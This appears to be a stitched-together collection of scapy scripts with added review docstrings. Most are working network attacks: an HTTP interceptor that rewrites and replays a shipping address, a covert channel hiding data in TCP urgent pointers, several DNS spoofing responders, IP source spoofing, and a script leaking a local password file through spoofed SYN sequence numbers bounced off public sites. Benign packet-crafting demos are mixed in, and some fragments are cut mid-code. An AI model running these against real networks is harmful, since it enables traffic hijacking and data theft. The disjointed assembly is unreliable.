def print_and_accept(pkt):
    """Queue callback that logs and replays ``/ex3/shipping`` requests.

    The queued packet is accepted before anything is inspected, so the
    original request always continues unchanged. If the packet is addressed
    to TCP port 80, has a Raw layer, and that payload mentions
    ``/ex3/shipping``, the last payload line is parsed as JSON, its
    ``shipping_address`` is overwritten, and the edited document is POSTed
    as a separate request whose status and body are printed.

    Review note: every step relies on the request body crossing this host
    as cleartext HTTP; a body protected by TLS would not be readable here.
    """
    shipping_path = re.compile("/ex3/shipping")

    # Verdict first: nothing below can hold back or alter the queued packet.
    pkt.accept()

    ip = IP(pkt.get_payload())
    # ip["TCP"] is indexed unconditionally, so non-TCP traffic raises here.
    if ip["TCP"].dport != 80 or not ip.haslayer("Raw"):
        return

    http = ip["Raw"].load.decode()
    if not shipping_path.search(http):
        return

    print("HTTP:")
    print(http)
    print("\nIP.show():")
    print(ip.show())

    # The JSON document is expected on the final line of the HTTP message.
    new_msg = json.loads(http.splitlines()[-1])
    new_msg["shipping_address"] = "*****@*****.**"

    # Only the local parsed copy is touched; it is displayed, never re-queued.
    ip["Raw"].load = new_msg
    print("\nIP.show() nr. 2:")
    print(ip.show())

    answer = requests.post(
        "http://com402.epfl.ch/hw1/ex3/shipping",
        data=json.dumps(new_msg),
        headers={"Content-Type": "application/json"},
    )
    print("\nAnswer code:")
    print(answer.status_code)
    print("\nAnswer text:")
    print(answer.text)
def send_data(self, bytestream):
    """Send one TCP segment whose urgent pointer encodes ``bytestream``.

    Destination host and both ports come from the instance accessors; the
    value stored in the urgent pointer is whatever ``self.int_for`` returns
    for ``bytestream``.

    Review note: a SYN that also sets URG and carries a non-zero urgent
    pointer is an unusual combination, which makes it a practical signature
    for network monitoring.
    """
    if self.verbose():
        print("Exfiltrating " + repr(bytestream.decode('us-ascii')))

    urg_bit, syn_bit = 0x20, 0x02

    segment = IP() / TCP()
    segment.dst = self.host()
    segment.dport = self.dest_port()
    segment.sport = self.source_port()
    segment.getlayer(TCP).flags = urg_bit | syn_bit
    segment.urgptr = self.int_for(bytestream)

    if self.verbose():
        segment.show()

    send(segment, verbose=self.verbose())
def get_response(pkt: IP):
    """Sniffer callback: answer queries naming ``page_name`` with ``FAKE_IP``.

    Only standard queries (opcode 0, no answers yet) are considered. For a
    match, a DNS message with two answer records pointing at ``FAKE_IP`` is
    sent back to the querying host and a status string is returned; every
    other packet yields ``None``.

    Review note: the reply reuses the query's transaction id and source
    port, which is what a stub resolver matches on over plain UDP. Resolvers
    that validate DNSSEC or use an encrypted transport do not accept such
    answers.
    """
    print("XD")
    is_plain_query = (
        DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0
    )
    if not is_plain_query:
        return None

    print("XD")
    if page_name not in str(pkt["DNS Question Record"].qname):
        return None

    ip_hdr = IP(dst=pkt[IP].src)
    udp_hdr = UDP(dport=pkt[UDP].sport, sport=53)
    answers = DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) / DNSRR(
        rrname=page_name, rdata=FAKE_IP)
    dns_msg = DNS(id=pkt[DNS].id, ancount=1, an=answers)

    spf_resp = ip_hdr / udp_hdr / dns_msg
    spf_resp.show()
    send(spf_resp, verbose=0, iface=IFACE)
    return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def modify(packet):
    """Queue callback: answer ``facebook.com.`` queries locally, pass the rest.

    ``self`` (MAC addresses) and ``ip`` (the address placed in the answer)
    are taken from the enclosing scope, which is not part of this listing.
    A matching query is dropped from the queue after a hand-built reply has
    been sent at layer 2; any other packet is accepted unchanged.

    Review note: the reply's IP source is set to the address the query was
    sent to, so the client cannot tell it apart from the resolver's answer
    without DNSSEC validation or an authenticated resolver transport.
    """
    pkt = IP(packet.get_payload())

    # pkt.qd is read unconditionally, so a packet without a DNS layer raises.
    if pkt.qd.qname != b'facebook.com.':
        packet.accept()
        return

    print(pkt.show())

    link = Ether(dst=self.MacList[0], src=self.LocalMac, type=2048)
    network = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    transport = UDP(sport=53, dport=pkt[UDP].sport)
    reply = DNS(
        id=pkt[DNS].id,
        qr=1,
        qdcount=1,
        ancount=1,
        nscount=0,
        arcount=0,
        qd=DNSQR(qname=pkt[DNS].qd.qname, qtype=1, qclass=1),
        an=DNSRR(rrname=pkt[DNS].qd.qname, type=1, rclass=1, rdata=ip),
        ns=None,
        ar=None,
    )
    p = link / network / transport / reply
    sendp(p, verbose=0)

    # Rewriting the queued payload in place was left disabled:
    # packet.set_payload(bytes(str(pkt), 'utf-8'))
    packet.drop()  # the original query never reaches the resolver
def get_response(pkt: IP):
    """Answer queries for listed sites with 127.0.0.1; forward the others.

    Packets that are not standard DNS queries (opcode 0, no answers) return
    ``None``. A query whose name contains any entry of ``website_list`` gets
    a locally built reply pointing at 127.0.0.1; every other query is
    handed to ``forward_dns`` and its result is returned.
    """
    is_query = DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0
    if not is_query:
        return None

    # Substring match against the textual form of the question name.
    site_in_list = any(
        site in str(pkt["DNS Question Record"].qname)
        for site in website_list
    )

    if not site_in_list:
        # Not on the list: resolve for real.
        return forward_dns(pkt)

    # Build the reply that points the listed name at the loopback address.
    answer = DNSRR(rrname=pkt[DNSQR].qname, ttl=299, rdata='127.0.0.1')
    spf_resp = IP(src=DNS_SERVER_IP, dst=pkt[IP].src) / UDP() / DNS(an=answer)

    # Banner and packet dump for demo purposes.
    print("******************** SITE IN BANNED LIST *****************")
    print("****************** SPOOFED PACKET BELOW ******************")
    spf_resp.show()

    send(spf_resp, verbose=2, iface=IFACE)
    return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def send(self, packet):
    """Wrap ``packet`` in IP/UDP, fragment it, and write the fragments to ``self.sock``.

    The payload is placed behind an IP header (``target_ip`` / ``return_ip``)
    and a UDP header (``target_port`` / ``return_port``), split with
    ``fragment`` at ``self.fragment_size``, and each fragment is written to
    the socket as a 4-byte big-endian length followed by the fragment bytes.
    The socket is created on demand through ``self.create()``.

    This is Python 2 code (print statements, ``except X, e`` syntax).

    NOTE(review): the listing lost its indentation; the nesting below is a
    reconstruction. In particular the ``raw_send`` check is placed inside
    the per-fragment loop -- confirm against the original file.
    """
    original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
    # Verbosity above 1 dumps the full, unfragmented packet first.
    if self.verbose > 1:
        print "Original packet:"
        original_packet.show()
        hexdump(str(original_packet))
    fragments = fragment(original_packet, fragsize = self.fragment_size)
    try:
        # i is the 1-based fragment counter used only in messages.
        i = 1
        for frag in fragments:
            if self.verbose > 1:
                print "Fragment %d of %d:" % (i, len(fragments))
                frag.show()
            # From here on frag is the serialized byte string, not a packet.
            frag = str(frag)
            # Length prefix: unsigned 32-bit, network byte order.
            length = struct.pack(">I", len(frag))
            # Lazy connect: also reconnects after a close() below.
            if not self.sock:
                print '[+] connecting ...'
                self.sock = self.create()
            print '[+] sending part %d of %d now..' % (i, len(fragments))
            hexdump(frag)
            if self.log:
                self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
            # Framing on the wire: length prefix, then the fragment itself.
            self.sock.send(length)
            self.sock.send(frag)
            if self.log:
                self.log('sent fragment %d of %d' % (i, len(fragments)))
            i += 1
            # With raw_send set the connection is torn down after sending;
            # presumably self.close() clears self.sock so the next fragment
            # reconnects -- confirm in close().
            if self.raw_send:
                if self.log:
                    self.log('forcing a new connection due to raw_send flag')
                self.close()
    except KeyboardInterrupt,e:
        # Report the interruption, then let it propagate to the caller.
        print "[-] keyboard interrupt while connecting/sending to redirector"
        raise KeyboardInterrupt,e
def get_response(pkt):
    """Answer ``trailers.apple.com`` queries with ``DNS_SERVER_IP``; forward others.

    Only standard queries (opcode 0, no answers) that do not originate from
    ``DNS_SERVER_IP`` are handled; anything else returns ``None``. A
    matching query receives a locally built reply with the same transaction
    id, and a summary string is returned. Non-matching queries go to
    ``forward_dns``.

    Review note: excluding packets sourced from ``DNS_SERVER_IP`` keeps the
    handler from reacting to that host's own queries.
    """
    handled = (
        DNS in pkt
        and pkt[IP].src != DNS_SERVER_IP
        and pkt[DNS].opcode == 0
        and pkt[DNS].ancount == 0
    )
    if not handled:
        return None

    if 'trailers.apple.com' not in str(pkt['DNS Question Record'].qname):
        return forward_dns(pkt)

    record = DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP)
    spoofed = (
        IP(dst=pkt[IP].src)
        / UDP(dport=pkt[UDP].sport, sport=53)
        / DNS(id=pkt[DNS].id, ancount=1, an=record)
    )
    print(spoofed.show())
    send(spoofed, verbose=0)
    return f'Spoofed DNS Response Sent: {spoofed.summary()}'
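class IPLayer(object):
    """Small builder around a scapy ``IP`` packet.

    ``arguments`` is a dictionary mapping attribute names to values. Names
    the packet does not already expose are skipped silently.

    Review note: keys are matched with ``hasattr``, so any existing
    attribute of the packet object is accepted, not only IP header fields.
    Callers that build ``arguments`` from external input should restrict the
    keys themselves.
    """

    def __init__(self, arguments=None):
        """Store the field dictionary; no packet exists until ``make()``.

        Raises:
            TypeError: if ``arguments`` is neither ``None`` nor a ``dict``.
                (The previous code returned a string from ``__init__``,
                which Python also reports as ``TypeError``.)
        """
        self.packet = None
        # A fresh dict per instance: a shared ``{}`` default would leak
        # fields between unrelated builders.
        if arguments is None:
            arguments = {}
        if not isinstance(arguments, dict):
            raise TypeError("Please provide a dictionary")
        self.arguments = arguments

    def _apply(self, fields):
        """Copy every entry of ``fields`` that the packet already exposes."""
        for name, value in fields.items():
            if hasattr(self.packet, name):
                setattr(self.packet, name, value)

    def make(self):
        """Create the ``IP`` packet, apply the stored fields, return ``self``."""
        self.packet = IP()
        self._apply(self.arguments)
        return self

    def updatePacket(self, arguments={}):
        """Apply further fields to the current packet.

        Returns the original error string when ``arguments`` is not a
        dictionary (callers may compare against it), otherwise ``None``.
        The default dict is never stored or mutated.
        """
        if not isinstance(arguments, dict):
            return "Please provide a dictionay"
        self._apply(arguments)

    def getPacket(self):
        """Return the current packet, or ``None`` before ``make()``."""
        return self.packet

    def show(self):
        """Delegate to the packet's own ``show()``."""
        return self.packet.show()

    def addTCP(self):
        """Stack a TCP layer from ``TCPLayer`` on top of the packet."""
        packet = TCPLayer()._getTCP()
        self.packet = self.packet / packet
        return self

    def prependEther(self):
        """Put an Ethernet layer from ``EtherLayer`` underneath the packet."""
        packet = EtherLayer()._getEther()
        self.packet = packet / self.packet
        return self

    @staticmethod
    def _getIP():
        """Return a bare ``IP`` layer.

        Declared static so it works both as ``IPLayer._getIP()`` and on an
        instance; without ``self`` the instance call used to fail.
        """
        return IP()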
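import os
import sys
import struct
from select import select
from scapy.all import IP
from fcntl import ioctl

# Read frames from the tap device and dump each one with scapy.
# NOTE(review): a tap interface normally delivers Ethernet frames, while the
# bytes are parsed as a bare IP header here -- confirm the framing.
f = os.open("/dev/tap0", os.O_RDWR)
try:
    while 1:
        # Block until the descriptor is readable; it is the only one watched.
        r = select([f], [], [])[0][0]
        if r == f:
            packet = os.read(f, 4000)
            ip = IP(packet)
            ip.show()
except KeyboardInterrupt:
    # Parenthesised form prints the same text under Python 2 and 3.
    print("Stopped by user.")
finally:
    # Release the descriptor on every exit path, not only at interpreter exit.
    os.close(f)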
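#!/usr/bin/python3
# Scapy is a Python library for designing, manipulating, intercepting and
# processing packets. It fills in header fields with defaults.
# Sending raw packets requires root.
from scapy.all import IP, ICMP, sr1, ls

# The source address is pinned to 192.168.0.1. If that is not this host's
# address, the echo reply is routed elsewhere and never arrives here.
ip_layer = IP(src="192.168.0.1", dst="www.google.com")
icmp_req = ICMP()

# ls() and show() write their output themselves and return None, so they
# are called directly instead of being wrapped in print().
ls(ip_layer)
ip_layer.show()
print(ip_layer.summary())
icmp_req.show()

# Layers are stacked with the / operator.
packet = ip_layer / icmp_req

# Bound the wait: without a timeout sr1() blocks until a reply shows up,
# which may be never. It returns None when the timeout expires.
received_packet = sr1(packet, timeout=2)
if received_packet:
    received_packet.show()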
# The IP source is taken from user input, so replies go to that address
# rather than to this host. Networks that apply source-address validation
# (BCP 38) drop such packets at the edge.
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1, qd=DNSQR(qname=query_input))

# Summary of what is about to be sent (single-argument print calls behave
# the same under Python 2, which this script targets via raw_input).
print("")
print("Information")
print("===========")
print("Source IP : %s" % source_input)
print("Destination IP: %s" % destination_input)
print("DNS Query : %s" % query_input)
print("")
print("Package details")
print("===============")
print("")
# Dump each layer, followed by a blank line.
for layer in (i, u, d):
    print(layer.show())
    print("")

# Confirmation: an empty answer counts as yes.
is_ok = raw_input("Is it OK? (Y/n)")

# Send or exit.
if is_ok in ("y", "Y", ""):
    p = send(i / u / d)
else:
    print("Bye.")
# Level 49 sits just below CRITICAL (50): only critical messages from
# scapy's runtime logger are emitted.
l = logging.getLogger("scapy.runtime")
l.setLevel(49)
from scapy.all import send, IP, TCP, ICMP, UDP


def _ip_header(row):
    """Build the IP header for one worksheet row.

    Column 0 holds the protocol name, columns 1 and 2 the source and
    destination. The source comes straight from the sheet, so it need not
    be this host's own address.
    """
    return IP(src=row[1].value, dst=row[2].value,
              proto=protocolNumber(row[0].value))


wb = load_workbook(filename=os.getcwd() + "/sample.xlsx")
# Use the sheet named 'Test' rather than the active one.
sheet = wb['Test']

for row in sheet.rows:
    protocol = row[0].value
    # Rows with any other value in column 0 are skipped untouched.
    if protocol == 'ICMP':
        # A TCP header (ports from columns 3 and 4) follows the ICMP header.
        a = _ip_header(row) / ICMP() / TCP(
            sport=row[3].value, dport=row[4].value) / "Hello World"
        a.show()
        send(a)
    elif protocol == 'TCP':
        a = _ip_header(row) / TCP(
            sport=row[3].value, dport=row[4].value,
            flags='S', seq=42) / "Hello World"
        a.show()
        send(a)
    elif protocol == 'UDP':
        # Built and displayed only; no send() appears in the visible lines.
        a = _ip_header(row) / UDP(
            sport=row[3].value, dport=row[4].value) / "Hello World"
        a.show()
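import select
import time

from scapy.all import IP, ICMP
from pytun import TunTapDevice, IFF_TAP, IFF_TUN, IFF_NO_PI

# Layer-3 tunnel device without the packet-information prefix, so every
# read returns one raw IP packet.
tun = TunTapDevice(flags=IFF_TUN | IFF_NO_PI, name="FakePing")
tun.addr = "10.10.10.1"
tun.netmask = '255.255.255.0'
tun.up()

epoll = select.epoll()
epoll.register(tun.fileno(), select.EPOLLIN)

# ICMP type 8 is Echo Request; type 0 (used in the reply) is Echo Reply.
ICMP_ECHO_REQUEST = 8

# desire_time and desire_ttl are not defined in this listing; presumably
# they are set elsewhere in the file -- confirm.
while True:
    # Drain everything that is readable without blocking.
    while epoll.poll(0):
        data = tun.read(tun.mtu)
        packet = IP(data)
        icmp_part = packet.getlayer(ICMP)
        # Answer echo requests only. Replying to other ICMP types (errors,
        # echo replies) with an Echo Reply would be wrong.
        if icmp_part is not None and icmp_part.type == ICMP_ECHO_REQUEST:
            time.sleep(desire_time)
            # Mirror addresses, id, sequence number and payload so the
            # sender matches the reply to its request.
            respacket = IP(src=packet.dst, dst=packet.src, ttl=desire_ttl)
            respacket /= ICMP(type=0, seq=icmp_part.seq, id=icmp_part.id)
            respacket /= icmp_part.payload
            tun.write(bytes(respacket))
            packet.show()
            respacket.show()
    # Short pause between polling rounds to avoid spinning the CPU.
    time.sleep(0.01)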
p=sr(IP(src="192.168.43.55", dst="www.secdev.org")/TCP(sport=RandShort(),dport=[20,21,80,443,3389], flags="S"),inter=0.5,retry=2,timeout=1) #traceroute traceroute(["www.google.com"], maxttl=20) #traceroute con puerto 23 traceroute (["10.1.99.2"],dport=23,maxttl=20) #paquete por capas IP() IP()/TCP() Ether()/IP()/TCP() IP()/TCP()/"GET / HTTP/1.1\r\n\r\n" Ether()/IP(dst="api.tidex.com")/TCP(dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n" Ether()/IP()/IP()/UDP() #armado de paquetes por capas a=Ether(); a.show() b=IP(); b.show() c=TCP(); c.show() d=sr(a/b/c,timeout=2) #enviar paquete por capas ans,unans=sr(IP(dst="api.tidex.com")/TCP(sport=RandShort(),dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n") #############HTTP ##super importante #https://stackoverflow.com/questions/9058052/unwanted-rst-tcp-packet-with-scapy #iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 192.168.43.55 -j DROP load_layer("http") req = HTTP()/HTTPRequest( Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive',
#! /usr/bin/env python
# Reads a local file character by character and places each character in
# the sequence number of a TCP SYN whose source address is the listener's.
#
# Review note: every packet leaves with a source address that is not this
# host's. Egress filtering on source address stops the traffic at the
# network edge, and outbound SYNs from a non-local source are a clear
# detection signal.
from scapy.all import TCP, IP, send
import time

src_naame = '10.0.2.15'  # IP address of the listener
src_port = 666  # port on which the listener is listening
i = 0  # index of the next destination in webs
sn = 70  # running counter; multiplied by 1000 it forms the sequence base
f = open("/home/MadMaxx/Desktop/psswd.txt", 'r')
webs = ['twitter.com', 'google.com', 'reddit.com']

for line in f.readlines():
    for c in line:
        serv = webs[i]
        ip = IP(dst=serv, src=src_naame)
        # Sequence number = counter * 1000 + character code.
        p = sn * 1000 + ord(c)
        tcp = TCP(sport=src_port, dport=443, flags='S', seq=p)
        send(ip / tcp)
        ip.show()
        tcp.show()
        time.sleep(0.5)
        # A FIN to the same destination follows each SYN.
        send(ip / TCP(dport=443, flags='F'))
        sn = sn + 1
        # Rotate through the destination list.
        i = 0 if i + 1 == len(webs) else i + 1